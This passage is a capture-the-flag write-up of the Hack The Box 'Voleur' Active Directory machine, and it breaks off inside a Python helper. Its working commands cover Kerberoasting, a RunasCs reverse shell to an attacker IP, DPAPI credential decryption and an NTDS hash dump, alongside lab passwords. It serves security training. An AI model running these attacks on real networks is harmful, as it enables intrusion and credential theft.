
Introduction

This writeup details the exploitation of the “Voleur” machine from Hack The Box. The primary objectives were to gain unauthorized access, escalate privileges, and retrieve sensitive data, specifically the user and root flags, to evaluate the security posture of the environment.

Attack Narrative

This section provides a detailed account of the red team’s actions, outlining the sequence of events that led to the successful compromise of the Voleur domain. Each step is described with its technical execution and significance.

Initial Reconnaissance

The assessment began with a network scan using Nmap to identify open ports on the target machine (IP: 10.10.11.76). The scan revealed multiple open ports, indicating a mixed Windows and Linux environment:

Scanned at 2025-07-06 20:50:12 +08 for 100s     

PORT STATE SERVICE REASON VERSION
53/tcp open domain syn-ack Simple DNS Plus
88/tcp open kerberos-sec syn-ack Microsoft Windows Kerberos (server time: 2025-07-06 12:53:06Z)
135/tcp open msrpc syn-ack Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack Microsoft Windows netbios-ssn
389/tcp open ldap syn-ack Microsoft Windows Active Directory LDAP (Domain: voleur.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds? syn-ack
464/tcp open kpasswd5? syn-ack
593/tcp open ncacn_http syn-ack Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped syn-ack
2222/tcp open ssh syn-ack OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
3268/tcp open ldap syn-ack Microsoft Windows Active Directory LDAP (Domain: voleur.htb0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped syn-ack
5985/tcp open http syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
9389/tcp open mc-nmf syn-ack .NET Message Framing
49664/tcp open msrpc syn-ack Microsoft Windows RPC
49667/tcp open msrpc syn-ack Microsoft Windows RPC
62863/tcp open msrpc syn-ack Microsoft Windows RPC
63992/tcp open ncacn_http syn-ack Microsoft Windows RPC over HTTP 1.0
63993/tcp open msrpc syn-ack Microsoft Windows RPC
64005/tcp open msrpc syn-ack Microsoft Windows RPC
64021/tcp open msrpc syn-ack Microsoft Windows RPC
Service Info: Host: DC; OSs: Windows, Linux; CPE: cpe:/o:microsoft:windows, cpe:/o:linux:linux_kernel

Host script results:
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 48495/tcp): CLEAN (Timeout)
| Check 2 (port 28661/tcp): CLEAN (Timeout)
| Check 3 (port 60782/udp): CLEAN (Timeout)
| Check 4 (port 35476/udp): CLEAN (Timeout)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
|_clock-skew: 2m52s
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| smb2-time:
| date: 2025-07-06T12:54:03
|_ start_date: N/A

TRACEROUTE (using port 139/tcp)
HOP RTT ADDRESS
1 278.24 ms 10.10.14.1
2 280.22 ms dc.voleur.htb (10.10.11.76)

The scan identified DNS, Kerberos, LDAP/LDAPS, SMB, RPC, ADWS (9389) and WinRM (5985) on a single host, the profile of a Windows domain controller (dc.voleur.htb), plus an OpenSSH service on 2222 that identifies itself as Ubuntu, pointing to a Linux subsystem on the same machine. The domain was identified as voleur.htb. Two host-script results matter for what follows: SMB signing is enabled and required, which rules out SMB relay, and the clock skew of 2m52s is inside the five-minute window Kerberos tolerates, but close enough that the red team synchronised time before every ticket request.

Kerberos Configuration Details

The attacking host's /etc/krb5.conf was configured as follows so that Kerberos-aware client tools (kinit, smbclient, evil-winrm) resolve the VOLEUR.HTB realm and locate its KDC; the realm name in the [realms] block must match default_realm exactly, or ticket requests fail with an unknown-realm error:

[libdefaults]
default_realm = VOLEUR.HTB
kdc_timesync = 1
ccache_type = 4
forwardable = true
proxiable = true
fcc-mit-ticketflags = true
dns_canonicalize_hostname = false
dns_lookup_realm = false
dns_lookup_kdc = true
k5login_authoritative = false
[realms]
VOLEUR.HTB = {
kdc = voleur.htb
admin_server = voleur.htb
}
[domain_realm]
.voleur.htb = VOLEUR.HTB
voleur.htb = VOLEUR.HTB

Initial Access with Compromised Credentials

Authentication via Kerberos

Using the starting credentials for the user ryan.naylor (password: HollowOct31Nyt), the red team authenticated to the voleur.htb domain over Kerberos. The host clock was first synchronised against the DC, because the KDC rejects requests whose timestamp is more than five minutes off, and a TGT was then requested with Impacket's getTGT:

$ ntpdate -u 10.10.11.76 && impacket-getTGT voleur.htb/ryan.naylor:HollowOct31Nyt -dc-ip 10.10.11.76

getTGT writes the ticket to ryan.naylor.ccache in the working directory; the file was exported through KRB5CCNAME so that every Kerberos-aware tool picks it up, and klist confirmed its contents:

$ export KRB5CCNAME=ryan.naylor.ccache
$ klist

Output:

Ticket cache: FILE:ryan.naylor.ccache
Default principal: ryan.naylor@VOLEUR.HTB

Valid starting Expires Service principal
07/06/2025 11:34:33 07/06/2025 21:34:33 krbtgt/VOLEUR.HTB@VOLEUR.HTB
renew until 07/07/2025 11:34:30

User Enumeration via SMB

The following command was executed to enumerate users on the domain controller (dc.voleur.htb) via SMB:

$ nxc smb dc.voleur.htb -u ryan.naylor -p HollowOct31Nyt --users -k
SMB         dc.voleur.htb   445    dc               [*]  x64 (name:dc) (domain:voleur.htb) (signing:True) (SMBv1:False)
SMB dc.voleur.htb 445 dc [+] voleur.htb\ryan.naylor:HollowOct31Nyt

The enumeration revealed 12 domain accounts:

SMB         dc.voleur.htb   445    dc               -Username-                    -Last PW Set-       -BadPW- -Description-                                               
SMB dc.voleur.htb 445 dc Administrator 2025-01-28 20:35:13 1 Built-in account for administering the computer/domain
SMB dc.voleur.htb 445 dc Guest <never> 0 Built-in account for guest access to the computer/domain
SMB dc.voleur.htb 445 dc krbtgt 2025-01-29 08:43:06 0 Key Distribution Center Service Account
SMB dc.voleur.htb 445 dc ryan.naylor 2025-01-29 09:26:46 0 First-Line Support Technician
SMB dc.voleur.htb 445 dc marie.bryant 2025-01-29 09:21:07 0 First-Line Support Technician
SMB dc.voleur.htb 445 dc lacey.miller 2025-01-29 09:20:10 0 Second-Line Support Technician
SMB dc.voleur.htb 445 dc svc_ldap 2025-01-29 09:20:54 0
SMB dc.voleur.htb 445 dc svc_backup 2025-01-29 09:20:36 0
SMB dc.voleur.htb 445 dc svc_iis 2025-01-29 09:20:45 0
SMB dc.voleur.htb 445 dc jeremy.combs 2025-01-29 15:10:32 0 Third-Line Support Technician
SMB dc.voleur.htb 445 dc todd.wolfe 2025-01-29 12:41:13 0 Second-Line Support Technician
SMB dc.voleur.htb 445 dc svc_winrm 2025-01-31 09:10:12 0
SMB dc.voleur.htb 445 dc [*] Enumerated 12 local users: VOLEUR
  • The presence of service accounts (svc_ldap, svc_backup, svc_iis, svc_winrm) suggests automation and service integration within the domain; their names also hint at what each one can reach (LDAP, backups, IIS, WinRM).
  • Technician accounts indicate a tiered support structure: First-Line, Second-Line, and Third-Line.
  • The Administrator account has one recorded failed logon attempt (BadPW = 1), possibly indicating probing or a misconfigured service.
  • The Guest account's password has never been set (<never>), which is normal for the built-in Guest account, disabled by default on a domain.

Accessing the IT Share

The smbclient tool was used to access the IT share on dc.voleur.htb:

$ kinit ryan.naylor@VOLEUR.HTB
$ smbclient -U 'ryan.naylor%HollowOct31Nyt' --use-kerberos=yes //dc.voleur.htb/IT
## Or using this command
$ KRB5CCNAME=ryan.naylor.ccache impacket-smbclient -k DC.VOLEUR.HTB
smb: \> ls
. D 0 Wed Jan 29 17:10:01 2025
.. DHS 0 Sun Jul 6 11:12:38 2025
First-Line Support D 0 Wed Jan 29 17:40:17 2025

Within the First-Line Support directory, an Excel file named Access_Review.xlsx was identified and downloaded:

smb: \> cd "First-Line Support"
smb: \First-Line Support\> ls
. D 0 2025-01-29 17:40:17
.. D 0 2025-01-29 17:10:01
Access_Review.xlsx A 16896 2025-01-30 22:14:25
smb: \First-Line Support\> get Access_Review.xlsx

Note: The Access_Review.xlsx file is critical as it may contain sensitive information about domain accounts and permissions.

Password Cracking of Excel File

The Access_Review.xlsx file was password-protected, requiring the red team to crack the password to access its contents. The office2john tool was used to extract the password hash:

$ office2john Access_Review.xlsx >> hash.txt
$ cat hash.txt
Access_Review.xlsx:$office$*2013*100000*256*16*a80811402788c037b50df976864b33f5*500bd7e833dffaa28772a49e987be35b*7ec993c47ef39a61e86f8273536decc7d525691345004092482f9fd59cfa111c

The hash was cracked using John the Ripper with the rockyou.txt wordlist:

$ john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
football1 (Access_Review.xlsx)

Upon opening the file with the password football1, the following service account credentials were revealed:

Service Account    Password
svc_ldap           M1XyC9pW7qT5Vn
svc_iis            N5pXyW1VqM7CZ8
svc_winrm          Need to ask Lacey as she reset this recently.
Todd.Wolfe         NightT1meP1dg3on14


The weak password protection on this sensitive document highlighted a significant vulnerability in the environment’s security practices.

Active Directory Enumeration with BloodHound

To understand the Active Directory structure and identify potential privilege escalation paths, the red team used BloodHound with ryan.naylor‘s credentials to collect data from the voleur.htb domain:

$ bloodhound-python -u ryan.naylor -p 'HollowOct31Nyt' -c All -d VOLEUR.HTB -ns 10.10.11.xx --zip -k

The analysis revealed that the svc_ldap account had:

  • GenericWrite permissions on lacey.miller.
  • WriteSPN permissions on svc_winrm.


Both rights allow the servicePrincipalName attribute of the target to be written (GenericWrite covers every attribute, WriteSPN that one specifically), which is all a targeted Kerberoast needs: set an SPN on the account, request a service ticket for it, and crack the ticket's encrypted part offline against the account's password.

Targeted Kerberoasting

Using the svc_ldap credentials (M1XyC9pW7qT5Vn), the red team performed a targeted Kerberoast attack to extract Kerberos ticket-granting-service (TGS) hashes for lacey.miller and svc_winrm. A Kerberos ticket was obtained:

$ ntpdate -u 10.10.11.76 && impacket-getTGT voleur.htb/svc_ldap:M1XyC9pW7qT5Vn -dc-ip 10.10.11.76
$ export KRB5CCNAME=svc_ldap.ccache

The targetedKerberoast.py tool (ShutdownRepo) was used to extract the TGS hashes. For every account the current user can write to, it adds a temporary SPN, requests a service ticket, prints the ticket in crackable form and then removes the SPN again:

https://github.com/ShutdownRepo/targetedKerberoast

$ python3 targetedKerberoast.py -k --dc-host dc.voleur.htb -u svc_ldap -d voleur.htb
[*] Starting kerberoast attacks
[*] Fetching usernames from Active Directory with LDAP
[+] Printing hash for (lacey.miller)
$krb5tgs$23$*lacey.miller$VOLEUR.HTB$voleur.htb/lacey.miller*$0a337ad********************
[+] Printing hash for (svc_winrm)
$krb5tgs$23$*svc_winrm$VOLEUR.HTB$voleur.htb/svc_winrm*$268845a**************************

The script output included hashes for lacey.miller and svc_winrm. The svc_winrm hash was saved and cracked using John the Ripper:

$ nano svc_winrm_hashes.txt
$ john --wordlist=/usr/share/wordlists/rockyou.txt svc_winrm_hashes.txt
AFireInsidedeOzarctica980219afi (?)

This revealed the password for svc_winrm as AFireInsidedeOzarctica980219afi.
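Before a hash goes to John or hashcat it is worth checking its encryption type: the $krb5tgs$23$ prefix above means the ticket was issued with RC4-HMAC, the cheapest type to crack (hashcat mode 13100), whereas an account restricted to AES would produce $krb5tgs$17$ or $krb5tgs$18$ hashes in a slightly different layout (modes 19600 and 19700). The following Python, added here as an example and not part of the original writeup or of targetedKerberoast, parses both layouts out of raw tool output, groups them by type with RC4 first, and reports the hashcat mode for each. The sample hash lines are constructed with filler hex; only the usernames, realm and SPN layout mirror the page.

```python
"""Triage $krb5tgs$ hashes emitted by targetedKerberoast / GetUserSPNs.

Added example, not from the original writeup or from targetedKerberoast.
SAMPLE_LINES are constructed (filler hex), not the redacted hashes on the page.
"""
import re
from collections import defaultdict

# hashcat mode per Kerberos encryption type (etype)
HASHCAT_MODES = {23: 13100, 17: 19600, 18: 19700}

# etype 23 (RC4-HMAC): $krb5tgs$23$*user$REALM$spn*$checksum(16 bytes)$edata
RC4_RE = re.compile(
    r"^\$krb5tgs\$23\$\*(?P<user>[^$]+)\$(?P<realm>[^$]+)\$(?P<spn>[^*]+)\*"
    r"\$(?P<checksum>[0-9a-fA-F]{32})\$(?P<edata>[0-9a-fA-F]+)$"
)
# etype 17/18 (AES-CTS-HMAC-SHA1-96): $krb5tgs$18$user$REALM$*spn*$checksum(12 bytes)$edata
AES_RE = re.compile(
    r"^\$krb5tgs\$(?P<etype>17|18)\$(?P<user>[^$]+)\$(?P<realm>[^$]+)\$\*(?P<spn>[^*]+)\*"
    r"\$(?P<checksum>[0-9a-fA-F]{24})\$(?P<edata>[0-9a-fA-F]+)$"
)


def parse_tgs_hash(line):
    """Return the fields of one $krb5tgs$ hash, or None if the line is not a hash."""
    line = line.strip()
    etype = 23
    m = RC4_RE.match(line)
    if m is None:
        m = AES_RE.match(line)
        if m is None:
            return None
        etype = int(m.group("etype"))
    return {
        "user": m.group("user"),
        "realm": m.group("realm"),
        "spn": m.group("spn"),
        "etype": etype,
        "hashcat_mode": HASHCAT_MODES[etype],
        "hash": line,
    }


def triage(lines):
    """Group hashes by etype, RC4 (23) first because it cracks fastest; keep non-hash lines for review."""
    buckets = defaultdict(list)
    skipped = []
    for line in lines:
        parsed = parse_tgs_hash(line)
        if parsed is None:
            if line.strip():
                skipped.append(line.strip())
            continue
        buckets[parsed["etype"]].append(parsed)
    order = sorted(buckets, key=lambda e: (e != 23, e))
    return {"by_etype": {e: buckets[e] for e in order}, "skipped": skipped}


# Constructed sample output: same shape as targetedKerberoast prints, filler hex instead of real ticket data.
SAMPLE_LINES = [
    "[+] Printing hash for (lacey.miller)",
    "$krb5tgs$23$*lacey.miller$VOLEUR.HTB$voleur.htb/lacey.miller*$" + "0a337ad" + "1" * 25 + "$" + "2f" * 48,
    "[+] Printing hash for (svc_winrm)",
    "$krb5tgs$18$svc_winrm$VOLEUR.HTB$*voleur.htb/svc_winrm*$" + "ab" * 12 + "$" + "c3" * 60,
]


def triage_sample():
    return triage(SAMPLE_LINES)


if __name__ == "__main__":
    result = triage_sample()
    for etype, hashes in result["by_etype"].items():
        for h in hashes:
            print(f"{h['user']:<14} etype={etype} hashcat -m {h['hashcat_mode']}")
```

Write each bucket to its own file and run hashcat with the mode the script reports; mixing RC4 and AES hashes in one file makes hashcat reject the whole input.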

Lateral Movement to svc_winrm

With the cracked svc_winrm credentials, the red team established a remote session using Evil-WinRM:

$ ntpdate -u 10.10.11.76 && impacket-getTGT voleur.htb/svc_winrm:AFireInsidedeOzarctica980219afi -dc-ip 10.10.11.76

$ export KRB5CCNAME=svc_winrm.ccache

$ evil-winrm -i dc.voleur.htb -k -u svc_winrm -r VOLEUR.HTB

Navigating to the svc_winrm user’s desktop, the team retrieved the user.txt flag:

*Evil-WinRM* PS C:\Users\svc_winrm\Documents> cd ../Desktop
*Evil-WinRM* PS C:\Users\svc_winrm\Desktop> dir

Directory: C:\Users\svc_winrm\Desktop

Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 1/29/2025 7:07 AM 2312 Microsoft Edge.lnk
-ar--- 7/6/2025 6:09 AM 34 user.txt

This marked the achievement of the first objective.

Restoring Deleted User Account


BloodHound analysis indicated that svc_ldap was a member of the RESTORE_USERS group, which grants the right to restore deleted Active Directory objects. The Active Directory PowerShell cmdlets needed for that run on the DC itself, so the red team uploaded RunasCs.exe through the svc_winrm session and used it to spawn a reverse shell in the svc_ldap context:

RunasCs is available from https://github.com/antonioCoco/RunasCs

*Evil-WinRM* PS C:\Users\svc_winrm\Documents> cd /
*Evil-WinRM* PS C:\> mkdir Tools

Directory: C:\

Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 7/6/2025 4:13 AM Tools

*Evil-WinRM* PS C:\> cd Tools
*Evil-WinRM* PS C:\Tools> upload RunasCs.exe

Info: Uploading /home/meow/Desktop/Voleur/RunasCs.exe to C:\Tools\RunasCs.exe

Data: 68948 bytes of 68948 bytes copied

Info: Upload successful!

A Netcat listener was set up on the attacker’s machine:

$ nc -lvnp 4444
listening on [any] 4444 ...

The reverse shell was initiated:

*Evil-WinRM* PS C:\Tools> .\RunasCs.exe svc_ldap M1XyC9pW7qT5Vn cmd.exe -r 10.10.16.xx:4444
[*] Warning: The logon for user 'svc_ldap' is limited. Use the flag combination --bypass-uac and --logon-type '8' to obtain a more privileged token.
[+] Running in session 0 with process function CreateProcessWithLogonW()
[+] Using Station\Desktop: Service-0x0-1d6443$\Default
[+] Async process 'C:\Windows\system32\cmd.exe' with pid 6456 created in background.

The reverse shell was successful, confirming the svc_ldap context:

$ nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.16.xx] from (UNKNOWN) [10.10.11.76] 60296
Microsoft Windows [Version 10.0.20348.3807]
(c) Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami
voleur\svc_ldap

Using PowerShell, the red team listed deleted user objects. Get-ADObject -IncludeDeletedObjects reads the Deleted Objects container; the DEL: suffix on the name and the populated lastKnownParent are what Restore-ADObject needs to put the object back where it was:

C:\Windows\system32>powershell
powershell
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

Install the latest PowerShell for new features and improvements! https://aka.ms/PSWindows

PS C:\Windows\system32> Get-ADObject -Filter 'isDeleted -eq $true -and objectClass -eq "user"' -IncludeDeletedObjects -Properties objectSid, lastKnownParent, ObjectGUID | Select-Object Name, ObjectGUID, objectSid, lastKnownParent | Format-List

Name : Todd Wolfe
DEL:1c6b1deb-c372-4cbb-87b1-15031de169db
ObjectGUID : 1c6b1deb-c372-4cbb-87b1-15031de169db
objectSid : S-1-5-21-3927696377-1337352550-2781715495-1110
lastKnownParent : OU=Second-Line Support Technicians,DC=voleur,DC=htb

The deleted user todd.wolfe was restored:

PS C:\Windows\system32> Restore-ADObject -Identity '1c6b1deb-c372-4cbb-87b1-15031de169db'
Restore-ADObject -Identity '1c6b1deb-c372-4cbb-87b1-15031de169db'

Verification confirmed the restoration:

PS C:\Windows\system32> net user /domain
net user /domain

User accounts for \\DC

-------------------------------------------------------------------------------
Administrator krbtgt svc_ldap
todd.wolfe
The command completed successfully.

The password for todd.wolfe (NightT1meP1dg3on14) was already known from Access_Review.xlsx. A restore through the Active Directory Recycle Bin brings the object back with its attributes intact, including the stored password and the original SID (S-1-5-21-...-1110), so that password was usable immediately; a bare tombstone reanimation without the Recycle Bin would have returned an account with most attributes stripped.

Accessing Additional Shares

Using todd.wolfe‘s credentials, the red team accessed the IT share:

$ ntpdate -u 10.10.11.76 && impacket-getTGT voleur.htb/todd.wolfe:NightT1meP1dg3on14 -dc-ip 10.10.11.76
$ export KRB5CCNAME=todd.wolfe.ccache
$ KRB5CCNAME=todd.wolfe.ccache impacket-smbclient -k DC.VOLEUR.HTB
# shares
ADMIN$
C$
Finance
HR
IPC$
IT
NETLOGON
SYSVOL
# use IT
# ls
drw-rw-rw- 0 Wed Jan 29 17:10:01 2025 .
drw-rw-rw- 0 Sun Jul 6 19:55:34 2025 ..
drw-rw-rw- 0 Wed Jan 29 23:13:03 2025 Second-Line Support
# mget Second-Line Support/Archived Users/todd.wolfe/AppData/Roaming/Microsoft/Credentials/772275FAD58525253490A9B0039791D3
[*] Downloading 772275FAD58525253490A9B0039791D3
# mget /Second-Line Support/Archived Users/todd.wolfe/AppData/Roaming/Microsoft/Protect/S-1-5-21-3927696377-1337352550-2781715495-1110/08949382-134f-4c63-b93c-ce52efc0aa88
[*] Downloading 08949382-134f-4c63-b93c-ce52efc0aa88

The archived profile holds a Credential Manager blob under Credentials\ and the DPAPI master key that protects it under Protect\<SID>\<GUID>. User master keys are encrypted with a key derived from the user's password, so todd.wolfe's DPAPI master key file was decrypted with dpapi.py using his SID (the directory name under Protect, matching the SID of the restored object) and his password:

$ impacket-dpapi masterkey -file 08949382-134f-4c63-b93c-ce52efc0aa88 -sid S-1-5-21-3927696377-1337352550-2781715495-1110 -password NightT1meP1dg3on14

Output:

Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[MASTERKEYFILE]
Version : 2 (2)
Guid : 08949382-134f-4c63-b93c-ce52efc0aa88
Flags : 0 (0)
Policy : 0 (0)
MasterKeyLen: 00000088 (136)
BackupKeyLen: 00000068 (104)
CredHistLen : 00000000 (0)
DomainKeyLen: 00000174 (372)

Decrypted key with User Key (MD4 protected)
Decrypted key: 0xd2832547d1d5e0a01ef271ede2d299248d1cb0320061fd5355fea2907f9cf879d10c9f329c77c4fd0b9bf83a9e240ce2b8a9dfb92a0d15969ccae6f550650a83

The credential file was then decrypted with dpapi.py using the recovered master key:

$ impacket-dpapi credential -file 772275FAD58525253490A9B0039791D3 -key 0xd2832547d1d5e0a01ef271ede2d299248d1cb0320061fd5355fea2907f9cf879d10c9f329c77c4fd0b9bf83a9e240ce2b8a9dfb92a0d15969ccae6f550650a83

Output:

Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[CREDENTIAL]
LastWritten : 2025-01-29 12:55:19
Flags : 0x00000030 (CRED_FLAGS_REQUIRE_CONFIRMATION|CRED_FLAGS_WILDCARD_MATCH)
Persist : 0x00000003 (CRED_PERSIST_ENTERPRISE)
Type : 0x00000002 (CRED_TYPE_DOMAIN_PASSWORD)
Target : Domain:target=Jezzas_Account
Description :
Unknown :
Username : jeremy.combs
Unknown : qT3V9pLXyN7W4m

Username        Password (shown as "Unknown" by dpapi.py)
jeremy.combs    qT3V9pLXyN7W4m
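A profile's Protect\<SID> directory often holds several master key files, and only one of them decrypts a given credential blob. The blob's header says which: every DPAPI blob starts with a version, the fixed DPAPI provider GUID, and the GUID of the master key that protected it, and the Credential Manager file wraps that blob in a small 12-byte header. The following Python, added here as an example and not part of the original writeup or of Impacket, parses those fields from a credential file and derives the share-relative path of the master key file to fetch, and also flags blobs that carry the CRYPTPROTECT_LOCAL_MACHINE flag, which a user password cannot decrypt. The credential file it works on is constructed inside the block; only the master key GUID and SID are taken from the page.

```python
"""Identify which DPAPI master key a Credential Manager blob needs.

Added example, not from the original writeup or from Impacket. The sample
credential file is constructed by build_sample_credential_file(); only the
master-key GUID and the SID below come from the page's output.
"""
import struct
import uuid

# Provider GUID that starts every blob produced by CryptProtectData
DPAPI_PROVIDER_GUID = uuid.UUID("df9d8cd0-1501-11d1-8c7a-00c04fc297eb")
# Flag meaning the blob was protected with the machine's master key, not the user's
CRYPTPROTECT_LOCAL_MACHINE = 0x4

TODD_SID = "S-1-5-21-3927696377-1337352550-2781715495-1110"  # from the page
MASTERKEY_GUID = "08949382-134f-4c63-b93c-ce52efc0aa88"       # from the page


def parse_credential_header(data: bytes) -> dict:
    """Parse the Credential Manager file wrapper and the leading fields of the DPAPI blob.

    Layout (little-endian):
      file:  Version(4) Size(4) Unknown(4) Data(Size)
      blob:  Version(4) ProviderGuid(16) MasterKeyVersion(4) MasterKeyGuid(16) Flags(4) ...
    """
    if len(data) < 12:
        raise ValueError("too short to be a credential file")
    file_version, size, _unknown = struct.unpack_from("<III", data, 0)
    blob = data[12:12 + size]
    if len(blob) < 44:
        raise ValueError("truncated DPAPI blob")
    (blob_version,) = struct.unpack_from("<I", blob, 0)
    provider = uuid.UUID(bytes_le=blob[4:20])           # GUIDs are stored in mixed-endian form
    (mk_version,) = struct.unpack_from("<I", blob, 20)
    mk_guid = uuid.UUID(bytes_le=blob[24:40])
    (flags,) = struct.unpack_from("<I", blob, 40)
    if blob_version != 1 or provider != DPAPI_PROVIDER_GUID:
        raise ValueError("payload is not a DPAPI blob")
    return {
        "file_version": file_version,
        "blob_size": size,
        "masterkey_guid": str(mk_guid),
        "masterkey_version": mk_version,
        "scope": "machine" if flags & CRYPTPROTECT_LOCAL_MACHINE else "user",
    }


def masterkey_path(sid: str, masterkey_guid: str,
                   profile_root: str = "AppData/Roaming/Microsoft/Protect") -> str:
    """Share-relative path of a user-scope master key inside a roaming profile."""
    return f"{profile_root}/{sid}/{masterkey_guid}"


def build_sample_credential_file(masterkey_guid: str, flags: int = 0,
                                 payload: bytes = b"\x00" * 64) -> bytes:
    """Constructed credential file with a well-formed header; payload stands in for the encrypted fields."""
    blob = (
        struct.pack("<I", 1)
        + DPAPI_PROVIDER_GUID.bytes_le
        + struct.pack("<I", 1)
        + uuid.UUID(masterkey_guid).bytes_le
        + struct.pack("<II", flags, 0)   # Flags, DescriptionLen
        + payload
    )
    return struct.pack("<III", 1, len(blob), 0) + blob


def locate_masterkey_for_sample() -> str:
    """Parse the constructed blob and return the master key file it points at."""
    info = parse_credential_header(build_sample_credential_file(MASTERKEY_GUID))
    return masterkey_path(TODD_SID, info["masterkey_guid"])


if __name__ == "__main__":
    print(locate_masterkey_for_sample())
```

On a real blob, `impacket-dpapi credential -file <blob>` run without -key prints the same header fields (the GuidMasterKey line is the one to match against the Protect directory), so the parser above is a way to understand what that output means rather than a replacement for it.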

Using credentials for jeremy.combs (qT3V9pLXyN7W4m), the red team accessed the Third-Line Support directory within the IT share:

$ ntpdate -u 10.10.11.76 && impacket-getTGT voleur.htb/jeremy.combs:'qT3V9pLXyN7W4m' -dc-ip 10.10.11.76
$ export KRB5CCNAME=jeremy.combs.ccache
$ KRB5CCNAME=jeremy.combs.ccache /usr/share/doc/python3-impacket/examples/smbclient.py -k DC.VOLEUR.HTB
cd Third-Line Support
ls
drw-rw-rw- 0 2025-01-31 00:11:29 .
drw-rw-rw- 0 2025-01-29 17:10:01 ..
-rw-rw-rw- 2602 2025-01-31 00:11:29 id_rsa
-rw-rw-rw- 186 2025-01-31 00:07:35 Note.txt.txt
mget id_rsa
mget Note.txt.txt

The Note.txt.txt file indicated that Windows Subsystem for Linux (WSL) was partially configured for backup tools:

$ cat Note.txt.txt
Jeremy,

I've had enough of Windows Backup! I've part configured WSL to see if we can utilize any of the backup tools from Linux.

Please see what you can set up.

Thanks,
Admin

SSH Access to Linux Subsystem

Using the id_rsa private key, the red team connected to the Linux subsystem on voleur.htb via SSH on port 2222 as the svc_backup user:

$ chmod 600 id_rsa
$ ssh svc_backup@voleur.htb -p 2222 -i id_rsa

The connection was successful, and the team accessed backup files located at /mnt/c/IT/Third-Line Support/Backups:

ll '/mnt/c/IT/Third-Line Support/Backups/Active Directory'
total 24592
drwxrwxrwx 1 svc_backup svc_backup 4096 Jan 30 03:49 ./
drwxrwxrwx 1 svc_backup svc_backup 4096 Jan 30 08:11 ../
-rwxrwxrwx 1 svc_backup svc_backup 25165824 Jan 30 03:49 ntds.dit*
-rwxrwxrwx 1 svc_backup svc_backup 16384 Jan 30 03:49 ntds.jfm*
ll '/mnt/c/IT/Third-Line Support/Backups/registry'
total 17952
drwxrwxrwx 1 svc_backup svc_backup 4096 Jan 30 03:49 ./
drwxrwxrwx 1 svc_backup svc_backup 4096 Jan 30 08:11 ../
-rwxrwxrwx 1 svc_backup svc_backup 32768 Jan 30 03:30 SECURITY*
-rwxrwxrwx 1 svc_backup svc_backup 18350080 Jan 30 03:30 SYSTEM*

Extracting Domain Hashes

The backup files (ntds.dit, ntds.jfm, SECURITY and SYSTEM) were transferred to the attacker's system using scp:

$ scp -P 2222 -i id_rsa "svc_backup@voleur.htb:/mnt/c/IT/Third-Line Support/Backups/Active Directory/*" ./ && \
scp -P 2222 -i id_rsa "svc_backup@voleur.htb:/mnt/c/IT/Third-Line Support/Backups/registry/*" ./

Output:

ntds.dit                                                                                                                                                                                                 100%   24MB   2.6MB/s   00:09    
ntds.jfm 100% 16KB 59.1KB/s 00:00
SECURITY 100% 32KB 92.4KB/s 00:00
SYSTEM 100% 18MB 2.9MB/s 00:06

Impacket's secretsdump was run in LOCAL mode against the copied files. The SYSTEM hive is required alongside ntds.dit because it holds the boot key that protects the Password Encryption Key inside the database; without it the hashes cannot be decrypted:

$ impacket-secretsdump -system SYSTEM -ntds ntds.dit LOCAL

This yielded the Administrator account’s NTLM hash, among others:

Administrator:500:aad3b435b51404eeaad3b435b51404ee:e656****************************:::
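An NTDS dump yields far more than the Administrator hash, and a quick pass over the output tells you what else the backup exposed: the krbtgt hash (enough to forge Kerberos tickets), accounts sharing one NT hash (password reuse), accounts with the empty-password hash, and whether LM hashes are still stored (the aad3b435... value above is the LM hash of an empty string, meaning they are not). The following Python, added here as an example and not part of the original writeup or of Impacket, performs that triage on secretsdump's `user:rid:lm:nt:::` lines. Its input is a constructed dump with made-up hashes and invented usernames (alice.example, bob.example); it does not describe the real accounts on this host.

```python
"""Triage a secretsdump NTDS dump: password reuse, blank passwords, LM storage, high-value RIDs.

Added example, not from the original writeup or from Impacket. SAMPLE_DUMP is
constructed: made-up hashes and invented usernames in secretsdump's line format.
"""
import re
from collections import defaultdict

EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"   # LM hash of the empty string: LM storage disabled
BLANK_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"   # NT hash of an empty password
WELL_KNOWN_RIDS = {500: "Administrator", 502: "krbtgt"}

# secretsdump line: [domain\]user:rid:lmhash:nthash:::
LINE_RE = re.compile(
    r"^(?:(?P<domain>[^\\:]+)\\)?(?P<user>[^:]+):(?P<rid>\d+):"
    r"(?P<lm>[0-9a-f]{32}):(?P<nt>[0-9a-f]{32}):::$"
)


def parse_line(line):
    """Return one account record, or None for status lines and anything else that is not a hash line."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    user = m.group("user")
    return {
        "domain": m.group("domain"),
        "user": user,
        "rid": int(m.group("rid")),
        "lm": m.group("lm"),
        "nt": m.group("nt"),
        "is_machine": user.endswith("$"),   # computer accounts have random 120-char passwords; skip for cracking
    }


def triage(lines):
    """Summarise what a dump exposes beyond individual hashes."""
    accounts = [a for a in map(parse_line, lines) if a]
    by_nt = defaultdict(list)
    for a in accounts:
        by_nt[a["nt"]].append(a["user"])
    return {
        "accounts": len(accounts),
        "lm_stored": [a["user"] for a in accounts if a["lm"] != EMPTY_LM],
        "blank_password": [a["user"] for a in accounts if a["nt"] == BLANK_NT and not a["is_machine"]],
        "password_reuse": {nt: users for nt, users in by_nt.items() if len(users) > 1 and nt != BLANK_NT},
        "high_value": {WELL_KNOWN_RIDS[a["rid"]]: a["nt"] for a in accounts if a["rid"] in WELL_KNOWN_RIDS},
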